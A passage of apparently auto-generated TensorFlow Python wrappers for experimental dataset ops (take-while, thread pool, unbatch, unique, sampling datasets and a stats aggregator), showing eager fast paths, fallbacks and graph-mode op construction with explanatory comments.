# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalStatsAggregatorHandle = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalStatsAggregatorHandle))
tf_export("raw_ops.ExperimentalStatsAggregatorHandle")(ExperimentalStatsAggregatorHandle)
def experimental_stats_aggregator_handle_eager_fallback(container="", shared_name="", name=None, ctx=None):
  r"""Eager-mode slow path for experimental_stats_aggregator_handle.

  Normalizes the string attrs and dispatches the op via _execute.execute.
  """
  exec_ctx = ctx or _context.context()
  container = _execute.make_str("" if container is None else container,
                                "container")
  shared_name = _execute.make_str("" if shared_name is None else shared_name,
                                  "shared_name")
  flat_inputs = []
  op_attrs = ("container", container, "shared_name", shared_name)
  outputs = _execute.execute(b"ExperimentalStatsAggregatorHandle", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalStatsAggregatorHandle", flat_inputs, op_attrs, outputs,
      name)
  handle, = outputs
  return handle
def experimental_stats_aggregator_summary(iterator, name=None):
  r"""Produces a summary of any statistics recorded by the given statistics manager.

  Args:
    iterator: A `Tensor` of type `resource`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `string`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: dispatch directly to the C layer.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalStatsAggregatorSummary", name,
        _ctx._post_execution_callbacks, iterator)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_stats_aggregator_summary_eager_fallback(
            iterator, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalStatsAggregatorSummary", iterator=iterator, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # This op carries no attrs.
  _attrs = None
  _execute.record_gradient(
      "ExperimentalStatsAggregatorSummary", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one string tensor.
  _result, = _result
  return _result
def ExperimentalStatsAggregatorSummary(iterator, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_stats_aggregator_summary(iterator=iterator, name=name)
ExperimentalStatsAggregatorSummary.__doc__ = experimental_stats_aggregator_summary.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalStatsAggregatorSummary = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalStatsAggregatorSummary))
tf_export("raw_ops.ExperimentalStatsAggregatorSummary")(ExperimentalStatsAggregatorSummary)
def experimental_stats_aggregator_summary_eager_fallback(iterator, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_stats_aggregator_summary.

  Coerces `iterator` to a resource tensor and runs the op directly.
  """
  exec_ctx = ctx or _context.context()
  iterator = _ops.convert_to_tensor(iterator, _dtypes.resource)
  flat_inputs = [iterator]
  # This op has no attrs.
  outputs = _execute.execute(b"ExperimentalStatsAggregatorSummary", 1,
                             inputs=flat_inputs, attrs=None, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalStatsAggregatorSummary", flat_inputs, None, outputs, name)
  summary, = outputs
  return summary
def experimental_take_while_dataset(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None):
  r"""Creates a dataset that stops iteration when `predicate` is false.

  The `predicate` function must return a scalar boolean and accept the
  following arguments:

  * One tensor for each component of an element of `input_dataset`.
  * One tensor for each value in `other_arguments`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when
      building a closure for `predicate`.
    predicate: A function decorated with @Defun.
      A function returning a scalar boolean.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalTakeWhileDataset", name, _ctx._post_execution_callbacks,
        input_dataset, other_arguments, "predicate", predicate,
        "output_types", output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_take_while_dataset_eager_fallback(
            input_dataset, other_arguments, predicate=predicate,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_take_while_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_take_while_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalTakeWhileDataset", input_dataset=input_dataset,
                                        other_arguments=other_arguments,
                                        predicate=predicate,
                                        output_types=output_types,
                                        output_shapes=output_shapes,
                                        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Targuments is inferred by the op builder from other_arguments' dtypes.
  _attrs = ("predicate", _op.get_attr("predicate"), "Targuments",
            _op.get_attr("Targuments"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalTakeWhileDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def ExperimentalTakeWhileDataset(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_take_while_dataset(input_dataset=input_dataset, other_arguments=other_arguments, predicate=predicate, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalTakeWhileDataset.__doc__ = experimental_take_while_dataset.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalTakeWhileDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalTakeWhileDataset))
tf_export("raw_ops.ExperimentalTakeWhileDataset")(ExperimentalTakeWhileDataset)
def experimental_take_while_dataset_eager_fallback(input_dataset, other_arguments, predicate, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_take_while_dataset."""
  exec_ctx = ctx or _context.context()

  def _checked_list(value, attr_name, convert):
    # Validate list-ness and coerce each entry, mirroring graph-mode checks.
    if not isinstance(value, (list, tuple)):
      raise TypeError(
          "Expected list for '%s' argument to "
          "'experimental_take_while_dataset' Op, not %r." % (attr_name, value))
    return [convert(v, attr_name) for v in value]

  output_types = _checked_list(output_types, "output_types",
                               _execute.make_type)
  output_shapes = _checked_list(output_shapes, "output_shapes",
                                _execute.make_shape)
  # Captured closure arguments may have mixed dtypes; record them as
  # Targuments alongside the converted tensors.
  targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, exec_ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset] + list(other_arguments)
  op_attrs = ("predicate", predicate, "Targuments", targuments,
              "output_types", output_types, "output_shapes", output_shapes)
  outputs = _execute.execute(b"ExperimentalTakeWhileDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalTakeWhileDataset", flat_inputs, op_attrs, outputs, name)
  dataset, = outputs
  return dataset
def experimental_thread_pool_dataset(input_dataset, thread_pool, output_types, output_shapes, name=None):
  r"""Creates a dataset that uses a custom thread pool to compute `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    thread_pool: A `Tensor` of type `resource`.
      A resource produced by the ThreadPoolHandle op.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalThreadPoolDataset", name, _ctx._post_execution_callbacks,
        input_dataset, thread_pool, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_thread_pool_dataset_eager_fallback(
            input_dataset, thread_pool, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_thread_pool_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_thread_pool_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalThreadPoolDataset", input_dataset=input_dataset,
                                         thread_pool=thread_pool,
                                         output_types=output_types,
                                         output_shapes=output_shapes,
                                         name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalThreadPoolDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def ExperimentalThreadPoolDataset(input_dataset, thread_pool, output_types, output_shapes, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_thread_pool_dataset(input_dataset=input_dataset, thread_pool=thread_pool, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalThreadPoolDataset.__doc__ = experimental_thread_pool_dataset.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalThreadPoolDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalThreadPoolDataset))
tf_export("raw_ops.ExperimentalThreadPoolDataset")(ExperimentalThreadPoolDataset)
def experimental_thread_pool_dataset_eager_fallback(input_dataset, thread_pool, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_thread_pool_dataset."""
  exec_ctx = ctx or _context.context()

  def _checked_list(value, attr_name, convert):
    # Validate list-ness and coerce each entry, mirroring graph-mode checks.
    if not isinstance(value, (list, tuple)):
      raise TypeError(
          "Expected list for '%s' argument to "
          "'experimental_thread_pool_dataset' Op, not %r." % (attr_name, value))
    return [convert(v, attr_name) for v in value]

  output_types = _checked_list(output_types, "output_types",
                               _execute.make_type)
  output_shapes = _checked_list(output_shapes, "output_shapes",
                                _execute.make_shape)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  thread_pool = _ops.convert_to_tensor(thread_pool, _dtypes.resource)
  flat_inputs = [input_dataset, thread_pool]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  outputs = _execute.execute(b"ExperimentalThreadPoolDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalThreadPoolDataset", flat_inputs, op_attrs, outputs, name)
  dataset, = outputs
  return dataset
def experimental_thread_pool_handle(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None):
  r"""Creates a handle to a custom thread pool, for use by thread-pool dataset ops.

  NOTE(review): the original generated summary was copied from the dataset op;
  this op takes no `input_dataset` and returns a `resource` handle.

  Args:
    num_threads: An `int`. The number of threads in the thread pool.
    display_name: A `string`.
      A human-readable name for the threads that may be visible in some
      visualizations of the threadpool.
    max_intra_op_parallelism: An optional `int`. Defaults to `1`.
      The maximum degree of parallelism to use within operations that execute on this
      threadpool.
    container: An optional `string`. Defaults to `""`.
    shared_name: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: attrs are passed in the exact order the C layer expects.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalThreadPoolHandle", name, _ctx._post_execution_callbacks,
        "num_threads", num_threads, "max_intra_op_parallelism",
        max_intra_op_parallelism, "display_name", display_name, "container",
        container, "shared_name", shared_name)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_thread_pool_handle_eager_fallback(
            num_threads=num_threads,
            max_intra_op_parallelism=max_intra_op_parallelism,
            display_name=display_name, container=container,
            shared_name=shared_name, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: default/normalize all attrs, then build the op.
  num_threads = _execute.make_int(num_threads, "num_threads")
  display_name = _execute.make_str(display_name, "display_name")
  if max_intra_op_parallelism is None:
    max_intra_op_parallelism = 1
  max_intra_op_parallelism = _execute.make_int(max_intra_op_parallelism, "max_intra_op_parallelism")
  if container is None:
    container = ""
  container = _execute.make_str(container, "container")
  if shared_name is None:
    shared_name = ""
  shared_name = _execute.make_str(shared_name, "shared_name")
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalThreadPoolHandle", num_threads=num_threads,
                                        display_name=display_name,
                                        max_intra_op_parallelism=max_intra_op_parallelism,
                                        container=container,
                                        shared_name=shared_name, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("num_threads", _op.get_attr("num_threads"),
            "max_intra_op_parallelism",
            _op.get_attr("max_intra_op_parallelism"), "display_name",
            _op.get_attr("display_name"), "container",
            _op.get_attr("container"), "shared_name",
            _op.get_attr("shared_name"))
  _execute.record_gradient(
      "ExperimentalThreadPoolHandle", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one resource tensor.
  _result, = _result
  return _result
def ExperimentalThreadPoolHandle(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_thread_pool_handle(num_threads=num_threads, display_name=display_name, max_intra_op_parallelism=max_intra_op_parallelism, container=container, shared_name=shared_name, name=name)
ExperimentalThreadPoolHandle.__doc__ = experimental_thread_pool_handle.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalThreadPoolHandle = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalThreadPoolHandle))
tf_export("raw_ops.ExperimentalThreadPoolHandle")(ExperimentalThreadPoolHandle)
def experimental_thread_pool_handle_eager_fallback(num_threads, display_name, max_intra_op_parallelism=1, container="", shared_name="", name=None, ctx=None):
  r"""Eager-mode slow path for experimental_thread_pool_handle."""
  exec_ctx = ctx or _context.context()
  num_threads = _execute.make_int(num_threads, "num_threads")
  display_name = _execute.make_str(display_name, "display_name")
  max_intra_op_parallelism = _execute.make_int(
      1 if max_intra_op_parallelism is None else max_intra_op_parallelism,
      "max_intra_op_parallelism")
  container = _execute.make_str("" if container is None else container,
                                "container")
  shared_name = _execute.make_str("" if shared_name is None else shared_name,
                                  "shared_name")
  flat_inputs = []
  op_attrs = ("num_threads", num_threads, "max_intra_op_parallelism",
              max_intra_op_parallelism, "display_name", display_name,
              "container", container, "shared_name", shared_name)
  outputs = _execute.execute(b"ExperimentalThreadPoolHandle", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalThreadPoolHandle", flat_inputs, op_attrs, outputs, name)
  handle, = outputs
  return handle
def experimental_unbatch_dataset(input_dataset, output_types, output_shapes, name=None):
  r"""A dataset that splits the elements of its input into multiple elements.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalUnbatchDataset", name, _ctx._post_execution_callbacks,
        input_dataset, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_unbatch_dataset_eager_fallback(
            input_dataset, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_unbatch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_unbatch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalUnbatchDataset", input_dataset=input_dataset,
                                      output_types=output_types,
                                      output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalUnbatchDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def ExperimentalUnbatchDataset(input_dataset, output_types, output_shapes, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_unbatch_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalUnbatchDataset.__doc__ = experimental_unbatch_dataset.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalUnbatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalUnbatchDataset))
tf_export("raw_ops.ExperimentalUnbatchDataset")(ExperimentalUnbatchDataset)
def experimental_unbatch_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_unbatch_dataset."""
  exec_ctx = ctx or _context.context()

  def _checked_list(value, attr_name, convert):
    # Validate list-ness and coerce each entry, mirroring graph-mode checks.
    if not isinstance(value, (list, tuple)):
      raise TypeError(
          "Expected list for '%s' argument to "
          "'experimental_unbatch_dataset' Op, not %r." % (attr_name, value))
    return [convert(v, attr_name) for v in value]

  output_types = _checked_list(output_types, "output_types",
                               _execute.make_type)
  output_shapes = _checked_list(output_shapes, "output_shapes",
                                _execute.make_shape)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  outputs = _execute.execute(b"ExperimentalUnbatchDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalUnbatchDataset", flat_inputs, op_attrs, outputs, name)
  dataset, = outputs
  return dataset
def experimental_unique_dataset(input_dataset, output_types, output_shapes, name=None):
  r"""Creates a dataset that contains the unique elements of `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalUniqueDataset", name, _ctx._post_execution_callbacks,
        input_dataset, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return experimental_unique_dataset_eager_fallback(
            input_dataset, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_unique_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_unique_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalUniqueDataset", input_dataset=input_dataset,
                                     output_types=output_types,
                                     output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalUniqueDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def ExperimentalUniqueDataset(input_dataset, output_types, output_shapes, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_unique_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalUniqueDataset.__doc__ = experimental_unique_dataset.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
ExperimentalUniqueDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalUniqueDataset))
tf_export("raw_ops.ExperimentalUniqueDataset")(ExperimentalUniqueDataset)
def experimental_unique_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_unique_dataset."""
  exec_ctx = ctx or _context.context()

  def _checked_list(value, attr_name, convert):
    # Validate list-ness and coerce each entry, mirroring graph-mode checks.
    if not isinstance(value, (list, tuple)):
      raise TypeError(
          "Expected list for '%s' argument to "
          "'experimental_unique_dataset' Op, not %r." % (attr_name, value))
    return [convert(v, attr_name) for v in value]

  output_types = _checked_list(output_types, "output_types",
                               _execute.make_type)
  output_shapes = _checked_list(output_shapes, "output_shapes",
                                _execute.make_shape)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  outputs = _execute.execute(b"ExperimentalUniqueDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs, ctx=exec_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalUniqueDataset", flat_inputs, op_attrs, outputs, name)
  dataset, = outputs
  return dataset
def sampling_dataset(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None):
  r"""Creates a dataset that contains `rate` elements from the `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    rate: A `Tensor` of type `float32`.
      A scalar representing the sample rate of elements from the `input_dataset`
      that should be taken.
    seed: A `Tensor` of type `int64`.
      A scalar representing seed of random number generator.
    seed2: A `Tensor` of type `int64`.
      A scalar representing seed2 of random number generator.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  # Eager fast path: inputs first, then attrs, in the exact order the C
  # layer expects for this op.
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "SamplingDataset", name, _ctx._post_execution_callbacks,
        input_dataset, rate, seed, seed2, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        # Fast path refused the inputs; retry through the slower eager path.
        return sampling_dataset_eager_fallback(
            input_dataset, rate, seed, seed2, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message to aid debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and coerce the list attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'sampling_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'sampling_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "SamplingDataset", input_dataset=input_dataset, rate=rate, seed=seed,
                           seed2=seed2, output_types=output_types,
                           output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "SamplingDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unpack the one variant tensor.
  _result, = _result
  return _result
def SamplingDataset(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return sampling_dataset(input_dataset=input_dataset, rate=rate, seed=seed, seed2=seed2, output_types=output_types, output_shapes=output_shapes, name=name)
SamplingDataset.__doc__ = sampling_dataset.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
# keyword-only calls -- TODO confirm), and export under tf.raw_ops.
SamplingDataset = _doc_controls.do_not_generate_docs(_kwarg_only(SamplingDataset))
tf_export("raw_ops.SamplingDataset")(SamplingDataset)
def sampling_dataset_eager_fallback(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for sampling_dataset."""
  exec_ctx = ctx or _context.context()

  def _checked_list(value, attr_name, convert):
    # Validate list-ness and coerce each entry, mirroring graph-mode checks.
    if not isinstance(value, (list, tuple)):
      raise TypeError(
          "Expected list for '%s' argument to "
          "'sampling_dataset' Op, not %r." % (attr_name, value))
    return [convert(v, attr_name) for v in value]

  output_types = _checked_list(output_types, "output_types",
                               _execute.make_type)
  output_shapes = _checked_list(output_shapes, "output_shapes",
                                _execute.make_shape)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  rate = _ops.convert_to_tensor(rate, _dtypes.float32)
  seed = _ops.convert_to_tensor(seed, _dtypes.int64)
  seed2 = _ops.convert_to_tensor(seed2, _dtypes.int64)
  flat_inputs = [input_dataset, rate, seed, seed2]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
